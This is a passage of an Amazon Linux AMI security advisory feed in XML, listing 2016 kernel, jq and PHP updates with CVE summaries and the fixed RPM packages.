arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package 
name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.21.0" release="9.76.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-debuginfo-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.21.0-9.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-703</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-703: medium priority package update for kernel</title><issued date="2016-05-18 14:00:00" /><updated date="2016-05-18 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4581:
1333712:
CVE-2016-4581 kernel: Slave being first propagated copy causes oops in propagate_mnt
CVE-2016-4565:
1310570:
CVE-2016-4565 kernel: infiniband: Unprivileged process can overwrite kernel memory using rdma_ucm.ko
CVE-2016-4558:
1334303:
CVE-2016-4558 kernel: bpf: refcnt overflow
CVE-2016-4557:
1334307:
CVE-2016-4557 kernel: Use after free vulnerability via double fdput
CVE-2016-4486:
1333316:
CVE-2016-4486 kernel: Information leak in rtnetlink
CVE-2016-4485:
1333309:
CVE-2016-4485 kernel: Information leak in llc module
CVE-2016-3961:
Xen and the Linux kernel through 4.5.x do not properly suppress hugetlbfs support in x86 PV guests, which allows local PV guest users to cause a denial of service (guest OS crash) by attempting to access a hugetlbfs mapped area.
1323956:
CVE-2016-3961 xsa174 xen: hugetlbfs use may crash PV Linux guests (XSA-174)
CVE-2016-0758:
A flaw was found in the way the Linux kernel&#039;s ASN.1 DER decoder processed certain certificate files with tags of indefinite length. A local, unprivileged user could use a specially crafted X.509 certificate DER file to crash the system or, potentially, escalate their privileges on the system.
1300257:
CVE-2016-0758 kernel: tags with indefinite length can corrupt pointers in asn1_find_indefinite_length()
CVE-2015-8839:
Multiple race conditions in the ext4 filesystem implementation in the Linux kernel before 4.5 allow local users to cause a denial of service (disk corruption) by writing to a page that is associated with a different user&#039;s file after unsynchronized hole punching and page-fault handling.
1323577:
CVE-2015-8839 kernel: ext4 filesystem page fault race condition with fallocate call.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8839" title="" id="CVE-2015-8839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0758" title="" id="CVE-2016-0758" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3961" title="" id="CVE-2016-3961" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4485" title="" id="CVE-2016-4485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4486" title="" id="CVE-2016-4486" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4557" title="" id="CVE-2016-4557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4558" title="" id="CVE-2016-4558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4565" title="" id="CVE-2016-4565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4581" title="" id="CVE-2016-4581" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.10" release="22.54.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-devel-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.10" release="22.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.10" release="22.54.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.10-22.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-704</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-704: low priority package update for kernel</title><issued date="2016-06-02 17:36:00" /><updated date="2016-06-03 19:27:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4913:
The get_rock_ridge_filename function in fs/isofs/rock.c in the Linux kernel before 4.5.5 mishandles NM (aka alternate name) entries containing \\0 characters, which allows local users to obtain sensitive information from kernel memory or possibly have unspecified other impact via a crafted isofs filesystem.
1337528:
CVE-2016-4913 kernel: Information leak when handling NM entries containing NUL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4913" title="" id="CVE-2016-4913" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.11" release="23.53.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.11" release="23.53.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.4.11-23.53.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-705</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-705: medium priority package update for jq</title><issued date="2016-06-02 17:38:00" /><updated date="2016-06-03 19:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8863:
A heap-based buffer overflow flaw was found in jq&#039;s tokenadd() function. By tricking a victim into processing a specially crafted JSON file, an attacker could use this flaw to crash jq or, potentially, execute arbitrary code on the victim&#039;s system.
1328747:
CVE-2015-8863 jq: heap-buffer-overflow in tokenadd() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8863" title="" id="CVE-2015-8863" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jq" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-devel" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-devel-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-debuginfo" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-debuginfo-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-libs" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-libs-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-libs" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-libs-1.5-1.2.amzn1.i686.rpm</filename></package><package name="jq" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-1.5-1.2.amzn1.i686.rpm</filename></package><package name="jq-devel" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-devel-1.5-1.2.amzn1.i686.rpm</filename></package><package name="jq-debuginfo" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-debuginfo-1.5-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-706</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-706: medium priority package update for php56</title><issued date="2016-06-02 17:44:00" /><updated date="2016-06-15 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5096:
1339949:
CVE-2016-5096 php: Integer underflow causing arbitrary null write in fread/gzread
CVE-2016-5095:
CVE-2016-5094:
1340738:
CVE-2016-5094 php: Integer overflow in php_html_entities()
CVE-2016-5093:
1339590:
CVE-2016-5093 php: Out-of-bounds heap read in get_icu_value_internal
CVE-2013-7456:
1340433:
CVE-2013-7456 gd, php: Out-of-bounds read in imagescale
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456" title="" id="CVE-2013-7456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093" title="" id="CVE-2016-5093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094" title="" id="CVE-2016-5094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5095" title="" id="CVE-2016-5095" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096" title="" id="CVE-2016-5096" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mssql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.22" release="1.125.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-debuginfo-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package 
name="php56-xmlrpc" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.22" release="1.125.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-odbc-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.22" 
release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.22" 
release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.22-1.125.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-707</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-707: medium priority package update for php55</title><issued date="2016-06-02 17:47:00" /><updated date="2016-06-15 13:30:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5096:
1339949:
CVE-2016-5096 php: Integer underflow causing arbitrary null write in fread/gzread
CVE-2016-5095:
CVE-2016-5094:
1340738:
CVE-2016-5094 php: Integer overflow in php_html_entities()
CVE-2016-5093:
1339590:
CVE-2016-5093 php: Out-of-bounds heap read in get_icu_value_internal
CVE-2016-4343:
